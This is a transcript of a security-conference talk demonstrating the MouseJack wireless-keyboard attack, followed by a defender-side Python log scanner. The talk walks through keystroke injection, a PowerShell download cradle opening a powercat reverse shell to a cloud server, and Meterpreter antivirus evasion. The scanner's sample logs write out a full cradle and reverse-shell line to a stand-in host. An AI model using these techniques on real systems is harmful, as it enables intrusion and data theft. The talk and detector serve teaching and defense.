
Hi everyone, welcome, and thanks for choosing my talk. I know there are a lot of really good ones today, so I appreciate you choosing mine. I promise I'll keep you entertained for the next 40-45 minutes. I just want to start by thanking James and everyone that helped put BSides Calgary together. I know it was a lot of work transitioning from a physical conference to a virtual one, and they did a tremendous job. I'm really excited to have been invited to be a speaker, and I hope I can put on a fun talk for everyone.

So today we're going to explore some common hacking tools and techniques. Organizations spend a lot of money on cyber defenses, but if you're not in the offensive or pen testing space, you might not know quite what hacking really looks like. So hopefully I can illustrate some of the concepts.
So who am I? My name's Scott Taylor and I work for MNP in their technology solutions group. Many people think of MNP as an accounting firm, but we also have a large nationwide technology solutions team and a cyber team that consults all across Canada. Myself, I work in a number of areas: assessments, cyber audit, network architecture and penetration testing. Disclaimer, though: all the views in this presentation are my own and not necessarily representative of my company, although there's nothing controversial here. Feel free to add me on LinkedIn, and I'm shoot for root on Twitter.
So I'll start by saying the obvious: don't do bad things. I'm going to show you some in-depth hacking demos, but keep a white hat on and don't try this on anything you don't own or have permission for, and certainly don't say "well, Scott showed me how." I'm going to be showing three demos, all in progressive difficulty for the hacker and progressive negative impact for the victim, and then we'll look at the risk and what that really means. These talks for a mixed audience are a little tricky, so I wanted to balance some beginner hacking concepts with some more advanced ones, have some fun, and hopefully everyone gets a little something out of this talk.
I'm going to have to go through the slides somewhat quickly; 45 minutes isn't a whole ton of time for everything I want to show, so let's get to it.

A little hacking 101. If you're a bad guy, what's the first thing you need to do? We need an attack vector to breach the perimeter, much like Juggernaut here. How do we do that? Well, phishing is as popular as ever. These are all common attack vectors: credential compromise, where a site gets breached and you've used the same password for everything (this is how Ray-Ban ads get put on your Facebook, by the way); or you could have a vulnerability in an operating system or network devices, and these are great if you find them, but often they get patched fairly quickly. So how about a vulnerability in wireless keyboards? Well, it's not exactly common, but it sure is fun, so this is the one we're going to explore today.

So enter MouseJack. This is the name of the vulnerability. It's from way back in 2016; it was discovered by Marc Newlin on the Bastille research team. He did a talk on it at DEF CON in 2016, and I recommend you check it out in full for in-depth details. It affects wireless mice and keyboards, and we're talking specifically the 2.4 gigahertz variety, not Bluetooth. Basically all old models send unencrypted traffic between the USB dongle and the keyboard. All major vendors were largely affected: we're talking Logitech, Dell, Microsoft. And this attack will work up to 100 meters away, which is about the length of a football field.

So that begs the question: have you patched the firmware in your keyboard dongles, the little USB thingies that you plug into your computer? Almost universally the answer is no. I used to work as a systems admin and I certainly never did. I've consulted for hundreds of organizations and the answer is always no. If you're wondering, patching the firmware takes about five minutes using a vendor-provided application. This doesn't seem like much, but if you have a thousand of these in your organization that can be quite the burden on IT. Many companies elect to just buy new ones, which aren't vulnerable.

So all we need for this demo is one fifty-dollar USB dongle called Crazyradio, and we need to load a specialized firmware on the device. These are sold online; they seem cheaper than they are, but we live in Canada and you'll probably spend more in shipping than on the dongle itself.

So this brings us to the first visual here. Now, if you've chosen not to patch your wireless devices, this is a potential attack that can occur. I'm going to illustrate the exact demo
that I'm going to show. So the box on the left is me, the attacker; I'm sitting at a bus stop. The box on the right is representative of the victim, in this case a desktop inside my house, but it can be equally symbolic of a computer in your business. Consider the box itself to be the physical house or a firewall, the logical perimeter. So step one, we need a tool to probe if there's a vulnerability in range. It responds and says "yep, I'm vulnerable to the MouseJack vulnerability," and then we're going to inject keystrokes to the keyboard, open up Notepad on the screen, and leave a little message for the victim.

Now, in this case the firewall doesn't even come into play; we never touched the network layer, so we were effectively walking right around it.

Tools and prep work. The first tool we need to use is called JackIt. Now this is a nifty little Python script you can get off of GitHub; these guys did a fantastic job on this. It's going to leverage the Crazyradio hardware that we purchased, scan for vulnerable keyboards, and allow us to write scripts for what we want to do in the attack. When we first run the tool, it discovers that I have a vulnerable Logitech keyboard. Now note the MAC address of the device and the type; we're going to need that
later. Now I should also mention there's one limiting factor you might encounter if you do this: if you run this in an area that picks up 50 of these, there's nothing to identify one as the device you might be targeting. You can run the attack on all 50 simultaneously, but it can sometimes be tricky to get the one you want. In my case I was the only one in range.

Now, with the hardware in place and the initial scan identifying the target, we will leverage a Ducky Script. If you aren't familiar with Ducky Scripts, they are super simple scripts used for USB Rubber Duckies, and those are little USB sticks you plug in to inject keystrokes. We aren't going to be using a Rubber Ducky, but we're still going to be using this language to help inject wireless keystrokes. The syntax is pretty easy to follow here. The GUI command is the same as hitting the Windows key, so GUI r is the same as launching the Run dialog box. We insert a few DELAY commands just because the injection happens much faster than a human would be typing, so we want to make sure it doesn't get ahead of itself. The STRING command is what we'll be typing, so in this case we're going to open up Notepad and send a message to the victim machine, and that's "follow the white rabbit, Neo," or at least follow shoot for root on Twitter. We're saving this to a script called rabbit2.txt; I had a one, but this one worked better.

So let's go over these three screens before I start the demo. I hope everything's big enough and people can see it; I tried to zoom in the best I could. Here on the left we have my attacking laptop with the Crazyradio dongle attached; I'm running a Kali Linux VM and the JackIt script. On the right we have the victim machine (we know this is the victim machine because of the sad kitty on it); this is a desktop inside my house. On the bottom screen you can see the footage from my Ring camera in front of my house, so you'll see me on the right side walking and sitting down at the bus stop to run this attack. As we said before, this will work up to 100 meters away from the target; the bus stop here is probably about 15 meters from where my computer is. Now I'll say this first: putting a video presentation together that combines three different videos, all simultaneous and in real time with each other, was considerably more challenging than the actual hack was.

So before I start, let's just go over the syntax of the JackIt command. I'm running the JackIt command; you can see the MAC address that we picked up in our probe, and we're going to put that in there; we're specifying the vendor, since we know it's a Logitech; and we're triggering my rabbit2 Ducky Script.
You can see me walking to the bus stop here as I trigger this attack. It starts off doing a sniff for the MAC address that we specified, it picks it up, and it knows what channel to communicate on.

And as the attack gets triggered, watch on the right-hand side: we pull up Notepad and we inject the malicious message that we want to put on the screen. Now I want to make it very clear: I'm not on my home network; I haven't touched the network layer at all. I'm merely sitting 15 meters away from it, so I have no internet connection at all at my bus stop.
So what do we want to do next? That leads us to our next demo here. If we're the hacker and we want to take this to the next level, we probably want to take full control over the machine. Now the difficulty of this is we don't have a visual on what's going on on the computer. It's a one-way injection at this point; we have no confirmation on our end that the injection succeeded, nor do we have the ability to do much after, at least yet. Our goal as the hacker is to get what's called a reverse shell. Now most people are familiar with the command prompt, and it's kind of like that, only think of it more as something containing the command prompt. The reverse shell connection is initiated on the victim machine, and it's going to connect back to us listening for it.

Now every business has a firewall; every home user has one, your router will act as one, and even if you just have a modem from your ISP there's still a firewall blocking the bad stuff from coming in. A firewall is in place to prevent us from barreling in like Juggernaut, but remember we are effectively already on the inside from our keyboard attack. So if we initiate the communication starting from the inside, it's less closely scrutinized going outbound, especially if we use a common port like 80 or 443. These are used for HTTP and HTTPS web browsing, so these aren't going to be monitored on the way out; we can kind of blend in a little easier.

So that brings us to visual number two for our second demo. The setup here is the same: I'm still at the bus stop. The only difference is I've added a command and control server to the mix, and what this is, it's a server that I can host my malware on. If I can convince the victim to pull my malware down, I'll hopefully receive my reverse shell back at it. So for this I've spun up an EC2 instance on Amazon cloud services. Now remember, I'm at the bus stop; I don't have any internet connection, so I'm going to use my brand new iPhone and utilize that sweet 5G to have a hotspot so I can SSH into my cloud. Now this doesn't use much data, because all the transfers are going to be between the desktop inside the house and my C2 server in the cloud, which happens to be in northern Virginia because I didn't change the default region.

So here we're going to probe looking for the vulnerability; it's going to come back and tell us that it is vulnerable. We're going to inject keystrokes again, only this time we want to trigger PowerShell to dial home to our command and control server. We're going to host the malicious PS1 script on a web server in the cloud, and it's going to fire back, poisoning the computer and telling it to create a reverse shell back to us in the cloud server. And I'm still never touching the network here at all; all I'm doing is connecting through my 5G hotspot to my command and control server, as well as injecting the malicious traffic into my computer inside the house.

So, prep work. First I need to spin up an AWS EC2 instance. Now this is pretty straightforward; note the IP address, we're going to need this later. AWS is great for this kind of stuff if
you're a white hat. I should mention an actual threat actor probably isn't going to use AWS, as it's not exactly anonymous; you have to give a credit card. They're more likely to spin up an anonymous VPS that they paid for with Bitcoin; you generally don't want a trail leading back to you. The other thing I should mention is, when you set up an AWS instance, lock down your public-facing ports to the networks that you'll be talking to; otherwise you'll be barraged with bots trying to probe and hack you within minutes. Bloody hackers: you're just trying to make a hacking video and they get all up in your business.

So the two tools that we're going to use here, they're kind of similar and they kind of go hand in hand. Netcat is a very common networking utility that helps establish TCP and UDP connections, and powercat is a very similar variant of this; it's basically a PowerShell function that acts like netcat. It's a fairly robust tool, but establishing our reverse shell is all we need for this demo. It's a lot of cats and shells, I know, but stick with me. We also need a web server to host our malware. Now we could use something robust like Apache, but all we need to do is share out a file, and for this we can use a very simple and handy Python module called SimpleHTTPServer, and that's exactly what it is: you call this module and it'll just share all the files in the directory.

Next we need to adjust our Ducky Script. It's basically the same as before, but instead of calling Notepad we're going to call a command prompt, which is in turn going to call the PowerShell download cradle. Now a download cradle is a single-line command to instruct the computer to go download something from a website as a string and then execute it; in our case it's our malicious powercat payload. Now the best part of this is it runs fileless, which means it never touches the disk; it only runs in memory. If we just go through the syntax here: IEX, that's short for Invoke-Expression; System.Net.WebClient is a class, and DownloadString is a method. You can see it pointing to our AWS IP address that we're hosting on port 80 on our command and control server; we just say http and it already knows it's going to be port 80. The next part of the command, after the semicolon, is going to call powercat and send a command shell back to us listening for it on port 443. Sound complicated yet?

So, expected loot. This is purely just to show you what's on the victim's computer, for visual's sake. At the root of C: I've placed a
directory called super secret docs with some secret documents on there, like credit card numbers. So when we get a reverse shell back, we want to look and see if we can find this. It's obviously a fake credit card; it starts with one two three four and ends in one two three four.

Okay, so as I start this demo I'm going to run tmux, just so I can split up the panes on my attacking machine.

I'm just going to pause it here. It gets kind of cut off here, but I'm SSHing into my Amazon cloud service, so the blue panes, I'm going to have those on the top and the bottom; the blue ones are going to be in the cloud, and the red is still my attacking laptop.

Now all I'm doing here is changing into the powercat directory. Remember, we're going to host the web server here and just share out the malicious PS1 script. I was going to show the code and stuff, but that's getting a little low-level, so just keep the high-level idea: we're sharing out the malicious file. And then on the pane below, this is where we're going to create our listener. All this does is listen for our return shell on port 443. I'm going to go back to my attacking laptop here. I'm just going to take our JackIt and Ducky Script command, and we're going to use this to trigger the keystrokes inside the house. So same deal as before: we're going to inject into here, only we're going to call a command prompt, and hopefully we get our reverse shell back. I know it's a little small on this screen on the right, but I showed on the screen before what's coming up there. So you can see it pulling our malicious file off of port 80 here, and look, we get a command prompt back here. I'm going to change into the C: directory and have a look at the super secret docs folder, and there's my credit card file: one two three four one two three four. So effectively now we've taken full control over the machine, and I have never touched the network.

So a word about privileges. You get whatever context the user logged into the machine has coming back to you on the reverse shell. So if this is a home machine, you'll likely be an admin and the attacker has complete control. Now, if this is a corporate environment and you're a regular user, you only get that level; you can only see the files that the user can see. If you manage to get a local admin or, even better, a domain admin, that would be
great from the attacker's point of view. If this was a business and you did only get a regular user, the next step would be to escalate the privileges, and there are many techniques to do this. Then one would use this as a pivot point in the network and move laterally until you find whatever you want.

So let's think about a hypothetical situation right now for those of you in the industrial controls world, and I know a lot of you in Calgary are. If this is an operator console and your HMI runs off of here, let's say you haven't followed your Purdue model and segmented your network appropriately: if there's a path out to the internet from it, you just let the attacker have the keys to your plant from anywhere in the world, all from a $50 dongle and a cloud server that costs five cents an hour.

So let's talk incident response for a second. Say we just did this attack on Bob's corporate computer and extracted the secret files. An incident gets triggered and they start investigating this machine. Now I'm not an IR guy or a forensics guy, but I'm guessing the logs are going to look a little funny here. We didn't do anything to disguise what we're doing, so the logs will be noisy; they're going to say what we did. But the great thing is we never touched the network at all. It's going to look like Bob typed all this in on his own. Is Bob a malicious insider? Chances are they're going to take this machine and re-image it to be sure that there's no malware on it, even though we never touched the disk. But this doesn't fix the hole: they're going to plug that same keyboard right back in. It's the last thing they're going to think about, so we can just come back later on and do it all over again. Just something to think about.

So the next thing you're going to ask: well, what about antivirus? Isn't that going to catch this? The answer is yes, it definitely might, but that doesn't mean we can't tweak things a little bit to get around it if
it does block. So antivirus, even free ones like AVG, they're really good at protecting you against yourself: sketchy websites you visit, things you click that you aren't supposed to, that type of thing. They aren't perfect against targeted attacks. They typically work at the most basic level, identifying known attack signatures and known behaviors, but if you can obfuscate those enough you might be able to slip something by. And I'm not picking on the vendors here; these are all quality products, and I think even some are sponsoring this event. For my home computer I'm using AVG. If you're attacking with well-known tools and payloads, chances are you'll get blocked, and this topic tends to be a bit of a cat and mouse game between offensive tools and defensive detection. You can usually test this out in the lab, seeing which of your payloads will bypass and which will get caught. If you happen to know which one you're attacking, all the better; sometimes you're blind as the attacker, but sometimes not. I'll give you an example: if I was targeting your organization, I would bring up all the IT job postings that you've had in the past and do a little OSINT here. If they all say you need to have (and this is just an example) McAfee endpoint experience, next I'd look up all your security staff on LinkedIn, and if I notice they're all McAfee certified, I can probably make an educated guess as to what I'm dealing with on the other end.

So that leads us to the next tool. This one's called Magic Unicorn, and this was written by TrustedSec's Dave Kennedy. This is a really great tool; this will allow us to write shellcode right into memory, and it's great for bypassing antivirus and anti-malware scanning interfaces. It integrates right with Metasploit. We can simply run a Python script, it's going to generate a bunch of code which writes to a file, we can host a file called powershell_attack, and we can catch our shell back in Metasploit, which is a comprehensive offensive
framework I'm sure most of you are fairly familiar with. So, full disclosure on this third demo: I am doing this one purely locally; I'm not at the bus stop anymore, just for the sake of time and complexity, but there's nothing to stop you from just chaining our previous attacks with this one. So as I start this, I've already cued up my command on the victim computer, but you can inject the keystrokes and do this just the same. Here I'm going to run the unicorn script on my attacking computer. The payload I'm creating is a windows/meterpreter/reverse_tcp payload, so this is a Metasploit Meterpreter payload; I'm specifying my attacking machine and my attacking port. It takes a second for this to run.
Okay, now once it runs it generates the two different files that we talked about. The first file is powershell_attack.txt; that's the one with all of our code in it that we're going to host. The next one is unicorn.rc, and that's just kind of like a packaged Metasploit file that puts in all of our parameters that we need.

So here I'm just going to view the powershell_attack file, and that looks like a bunch of gibberish. It's a bunch of shellcode that's not really human readable, but it also kind of fools the antivirus a little bit. This is just going to get injected straight into memory, but when it really gets cooked into this, it's our reverse shell.

On our left-hand pane I'm going to fire up Metasploit. We're going to host this file on port 80, as we talked about, and while this is running I want to point you to the victim computer on the right here. We're just going to go look in the tray; we're going to hover over AVG: protected. Windows Security: protected. So I've got all the defensive layers turned on on this computer. We start our handler on the left, so we're going to be listening on port 443 just as we did before, and when we launch the attack the window disappears. You can see it pulling our file from here: the GET request that pulls the powershell_attack code, and 200 means it's a success. It takes a minute or two for it to pop back, and we get a Meterpreter shell coming back. Let's just check out our sessions, and there's our shell. So we still have access to this computer and antivirus didn't see it at all.

So let's bring all this full circle and talk about what really matters, and that's risk. Risk is likelihood times impact. Now I don't want to suggest that there is a high likelihood that there will be a skilled enough hacker sitting at your community bus stop or outside your business or your plant, but you always need to be conscious of what data or systems you're protecting
and always use a defense-in-depth strategy. If you're a business that could be a high-value target, you should consider the potential impact here. Would your Nessus scan have caught this vulnerability? No. Did the compliance framework you've been checking boxes off deal with this directly? No, not really. So just something to think about.

So, takeaways. If what you got out of this presentation is "I need to go patch my keyboard dongles," well, that's good, but a better takeaway is: be conscious of all the devices coming into your network. Maybe I don't get you through the keyboard; maybe I get you through your printer or your doorbell camera or your smart toaster. And most importantly, the only true defense is a layered one. As you can tell, hackers like to chain techniques together to defeat your defenses; you need defense in depth. If application whitelisting or PowerShell script monitoring was on, this could probably stop the attack. If the outbound traffic is inspected, that might have stopped the attack. If users have proper security awareness, maybe Bob notices the big black and blue screens popping up on his screen and tells IT about it, and maybe that stops the attack. Anyway, just something to think about.

So I'm out of time now for my presentation, but I really hope you guys enjoyed my talk, and like I said, I'll be around in the networking portion if you have any questions about this talk or cyber security in general or career advice. I'm happy to talk.
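Two of the controls the talk says would have stopped the second demo are PowerShell script monitoring (catching the IEX/DownloadString download cradle) and inspection of outbound traffic (catching the shell dialling out on 80 or 443). The block below is an added detection example, not code from the talk or from any of the tools it names. It reads constructed log lines in a simplified key=value layout (not real Windows event XML; "id" stands in for the event ID, 4104 for a PowerShell script block and 3 for a process network connection), flags script blocks that pair an evaluator such as IEX with a remote fetch such as Net.WebClient or DownloadString, decodes an -enc/-EncodedCommand blob so the same check runs on the hidden command, and flags a script host such as powershell.exe connecting to a non-internal address on a web port. The log format, the 203.0.113.10 address standing in for the attacker's cloud host, and the sample scripts are all assumptions made for the example.

```python
"""Defender-side sketch: script-block monitoring for download cradles and
egress inspection for script hosts. Added example; all log lines below are
constructed and use a simplified key=value layout, not real event XML."""
import base64
import binascii
import ipaddress
import re
from typing import Dict, List

# A cradle needs both halves: something that evaluates text as code and
# something that fetches that text from the network. Requiring both keeps
# ordinary downloads (e.g. Invoke-WebRequest -OutFile) from alerting.
EVALUATORS = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
FETCHERS = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# -enc / -EncodedCommand followed by a base64 blob (UTF-16LE once decoded).
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# Script hosts that rarely need to reach the internet directly from a
# workstation; tune to the environment (assumption for this example).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WEB_PORTS = {80, 443}
# RFC 1918 plus loopback; anything else is treated as external here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed encoded command so the sample log below is self-consistent.
_ENC_BLOB = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
    .encode("utf-16-le")).decode("ascii")

# Constructed sample logs. 203.0.113.10 (a documentation address) stands in
# for the attacker's cloud host; 10.0.0.5 is an internal server.
SAMPLE_LOGS = [
    'id=4104 user=bob script="Get-ChildItem C:\\Users\\bob\\Documents | Measure-Object"',
    'id=4104 user=bob script="IEX (New-Object System.Net.WebClient).DownloadString(\'http://203.0.113.10/powercat.ps1\'); powercat -c 203.0.113.10 -p 443 -e cmd"',
    'id=4104 user=bob script="Invoke-WebRequest -Uri https://intranet.example.local/report.csv -OutFile C:\\temp\\report.csv"',
    f'id=4104 user=bob script="powershell -nop -w hidden -enc {_ENC_BLOB}"',
    'id=3 user=bob image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" dst=10.0.0.5 dport=443',
    'id=3 user=bob image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" dst=203.0.113.10 dport=443',
    'id=3 user=bob image="C:\\Program Files\\Mozilla Firefox\\firefox.exe" dst=198.51.100.7 dport=443',
]

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> Dict[str, str]:
    """Split a key=value line; values may be double-quoted."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _KV.finditer(line)}


def classify_script(script: str) -> List[str]:
    """Name the indicators present in one script-block text."""
    hits: List[str] = []
    text = script
    enc = ENCODED.search(text)
    if enc:
        hits.append("encoded-command")
        try:  # run the same checks over the decoded command, not just the wrapper
            text += " " + base64.b64decode(enc.group(1)).decode("utf-16-le", errors="replace")
        except (binascii.Error, ValueError):
            pass
    if EVALUATORS.search(text) and FETCHERS.search(text):
        hits.append("download-cradle")
    return hits


def classify_connection(image: str, dst: str, dport: int) -> List[str]:
    """Flag a script host talking to a non-internal address on a web port."""
    exe = image.rsplit("\\", 1)[-1].lower()
    addr = ipaddress.ip_address(dst)
    internal = any(addr in net for net in INTERNAL_NETS)
    if exe in SCRIPT_HOSTS and dport in WEB_PORTS and not internal:
        return ["script-host-egress"]
    return []


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Run both checks over a batch of lines and return the alerts in order."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if rec.get("id") == "4104":
            hits = classify_script(rec.get("script", ""))
        elif rec.get("id") == "3":
            hits = classify_connection(rec.get("image", ""), rec.get("dst", ""),
                                       int(rec.get("dport", "0")))
        else:
            hits = []
        if hits:
            alerts.append({"user": rec.get("user"), "indicators": hits, "line": line})
    return alerts


if __name__ == "__main__":
    for alert in scan_logs(SAMPLE_LOGS):
        print(alert["user"], alert["indicators"], alert["line"][:80])
```

Running it over the sample yields three alerts: the plain cradle, the encoded command (flagged both for being encoded and, after decoding, for the cradle inside it), and powershell.exe reaching an external address on 443. The benign directory listing, the intranet file download and the browser's own HTTPS traffic stay quiet, which is the point of requiring both halves of the cradle and keying the egress rule on the process rather than on the port that the talk notes blends in so well.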